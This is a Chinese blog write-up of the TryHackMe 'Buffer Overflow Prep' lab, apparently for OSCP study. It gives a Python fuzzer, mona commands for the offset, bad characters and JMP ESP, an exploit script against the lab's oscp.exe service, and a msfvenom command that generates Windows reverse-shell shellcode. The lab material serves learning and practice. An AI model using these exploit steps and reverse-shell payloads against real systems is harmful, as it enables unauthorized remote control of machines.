TryHackMe学习笔记-Buffer Overflow Prep

最新推荐文章于 2023-03-02 18:28:55 发布
最新推荐文章于 2023-03-02 18:28:55 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: # PWN 文章标签: 网络安全 信息安全 渗透测试 安全漏洞 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122016464
版权

文章目录

概述

TryHackMe学习笔记,靶机链接https://tryhackme.com/room/bufferoverflowprep,练习Windows环境下的缓冲区溢出,使用的动态调试软件为Immunity Debugger,使用的插件为mona,存在缓冲区溢出漏洞的软件为oscp.exe,是一个32位的程序。

访问靶机

启动靶机后,得到IP地址为10.10.162.39,通过靶机给出的账号密码通过远程桌面登录,双击oscp.exe启动靶机,此软件监听1337端口,在攻击机上可以通过nc 10.10.162.39 1337连接

oscp.exe提供10个练习,分别是OVERFLOW1-10,每个环境的偏移量和坏字符不同,以OVERFLOW1为例

在这里插入图片描述

溢出过程

Immunity Debugger目录配置

使用mona插件,首先配置其目录

!mona config -set workingfolder c:\mona\%p

模糊测试

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.162.39"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)

可以看到发送2000字节时程序发生异常
在这里插入图片描述

定位偏移

  • 通过Immunity Debugger调用oscp.exe
  • 在攻击机使用命令msf-pattern_create -l 2000生成2000字节字符串
  • 修改测试脚本发送这个字符串,程序异常
  • 程序在Immunity Debugger的命令输入框中输入!mona findmsp -distance 2000,查看此时的EIP值
  • 显示偏移1978
    在这里插入图片描述

确认偏移

上步得到偏移1978,覆盖了buffer和ebp,接下来修改payload为'A'*1978+'B'*4,运行程序后,发现EIP被覆盖为42424242,为字母B,说明成功覆盖EIP。
在这里插入图片描述

寻找坏字符

控制了EIP,就可以注入shellcode,但并不是所有字符都能成为shellcode的组成字符,如\x00,因此需要测试坏字符。

  • 通过Immunity Debugger调用oscp.exe
  • 在Immunity Debugger的命令行输入框输入!mona bytearray -b "\x00",排除\x00
  • 此时测试代码为
import socket

ip = "10.10.162.39"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

查看Immunity Debugger寄存器窗口esp的值,此时为02B4FA30

  • 在命令行窗口输入!mona compare -f C:\mona\oscp\bytearray.bin -a 02B4FA30得到坏字符为\x00\x07\x2e\xa0

确认返回地址

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

会出现一系列符合条件的地址,任选一个,如625011AF,但要注意调整为小端序

生成shellcode

通过msfvenom生成shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

溢出

此时的payload组成为buffer = prefix + overflow + retn + padding + payload + postfix,运行此代码后得到反弹shell
在这里插入图片描述

galaxy3000
关注
专栏目录
Buffer-OverFlow-Prep:OSCP的缓冲区溢出准备
04-06
缓冲区溢出 OSCP的缓冲区溢出准备
Tryhackme-Buffer Overflow Exploitation
个人博客
09-01 1349
Buffer Overflow Exploitation 文章目录Buffer Overflow ExploitationBuffer Overflow PrepTask1 Deploy VMTask2 oscp.exe - OVERFLOW1Task3 oscp.exe - OVERFLOW2Task4 oscp.exe - OVERFLOW3Task5 oscp.exe - OVERFLOW4Task6 oscp.exe - OVERFLOW5Task7 oscp.exe - OVERFLOW6Task
TryHackMe-进攻性渗透测试-19_缓冲区溢出_Brainpan
M1n9K1n9的博客
12-28 673
rainpan非常适合OSCP练习,强烈建议在考试前完成。通过分析 Linux 计算机上可切割的 Windows exe 来利用缓冲区溢出漏洞。如果你被困在这台机器上,不要放弃(或看写),只要更加努力。这是一个定位难度:难 的房间,不过经过前面的缓冲区溢出练习,相信也不会有什么大问题循例,nmap扫nc都连一下,10000端口是web服务,9999不知道是什么东西,不过按照以往经验,这玩意铁定存在栈溢出漏洞既然开了web,我们循例也扫一下目录,因为主页就一张图片啥也没了。
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 314
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
TryHackMe-进攻性渗透测试-16_缓冲区溢出
M1n9K1n9的博客
12-27 289
相对较难,需要有较好的计组底子缓冲区溢出基础:https://tryhackme.com/room/bof1关于国内的博客讲的非常好的一篇文章,讲的很透彻很仔细:https://www.cnblogs.com/02SWD/p/15952483.html。
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
程序员考试刷题-java-oca-prep:java-oca-prep
07-07
程序员考试刷题Java OCA 准备 一组代码片段,展示了 Java 编程语言的基本特性。 该套装是为准备 Oracle Certified Associate (OCA-808) ...除非另有标记,否则在查看代码时问自己以下三个基本问题: ...
程序员考试刷题-c--part1-exam-prep2:c--part1-exam-prep2
07-07
程序员考试刷题c--part1-exam-prep2 问题 1 – 虫族!!! Prelate Zeratul 和 High Templar Tassadar,来自 Protoss 种族的高度灵能外星生命形式,聚在一起了解低级基本异形 Zerg(保加利亚语“дзверг”)...
程序员考试刷题-c--part1-exam-prep1:c--part1-exam-prep1
07-07
程序员考试刷题c--part1-exam-prep1 问题 1 – 3-6-9 在秘密服务中,他们使用非常秘密的技术来发送加密的秘密信息。 一种这样的秘密技术是将秘密文本作为用秘密代码秘密编码的秘密数字发送。 不幸的是,负责该特定...
【Try Hack Me】Buffer Overflow-2
人间体佐菲的博客
11-07 182
【Try Hack Me】Buffer Overflow-2
try-hack-me:TryHackMe.com实验室
04-04
试试我 TryHackMe.com实验室
史上最详细的Buffer Overflow学习笔记
m0_57221101的博客
03-17 1669
如果您被标题吸引进来了,却发现我写的很烂,请不要生气; 如果您发现我写的有误,欢迎您于评论区中指教 文章中出现的对于BOF来说相关的专业名词,都可以在最后找到解释 如果这篇文章能在您学习的路上帮助到您,我感到非常荣幸 照片问题因为csdn不接受外链,照片不能直接传上来,所以这里采用截图的方式,但由于图中没什么重要信息,大家就当看个乐呵,如果真想看清楚的图,看文章末尾 环境配置 此处演示使用环境来自于TryHackMe | Buffer Overflow Prep 使用方法参考页面内教程 或者
TryHackMe-进攻性渗透测试-17_缓冲区溢出_Brainstorm
M1n9K1n9的博客
12-27 241
对聊天程序进行逆向工程并编写脚本以利用 Windows 计算机。端口藏的深,需要 -p-将这些文件下载。由于我这里没有配置好的windows环境,就借用https://tryhackme.com/room/bufferoverflowprep这个房间的靶机来完成。在win机器上运行这个exe,看命令行说是开了个服务,刚刚扫到个9999未知服务,用nmap -sV,nmap卡死了貌似。用nc连接一下看看。
TryHackMe学习笔记-Windows PrivEsc Arena
网安星空
09-20 901
通过靶机练习常见的Windows系统提权手法
TryHackMe-黑我杯
M1n9K1n9的博客
03-02 884
相信我们大家在TryHackMe的日积月累都学到了不少东西,从纯萌新到oscp再到更高我很高兴能将国内各thm玩家聚集到一起,构建一个更好的学习环境和氛围。
缓冲区溢出(buffer overflow)机理分析
xyyangkun的专栏
01-18 3600
http://blog.sina.com.cn/s/blog_4c72721c010008vt.html             ##########################################                 缓冲区溢出(buffer overflow)机理分析             ################################
TryHackMe-Gatekeeper
网安星空
12-28 912
TryHackMe靶场,缓冲区溢出,使用Immunity进行溢出测试,
Tryhackme - Retro
冬萍子癸水
05-28 1134
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
TryHackMe学习笔记-Reversing ELF-1
网安星空
12-22 273
pwn学习,对elf进行逆向,使用了IDA静态分析与动态分析技术和gdb对目标进行分析
PREP-CHEM-SRC使用手册
最新发布
09-11
PREP-CHEM-SRC是一个化学预处理工具,用于处理化学数据和计算化学性质。提供了一系列功能和工具,帮助研究人员进行化学计算和分析。 这是一个简要的PREP-CHEM-SRC使用手册: 1. 安装和配置: - 首先,确保您的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值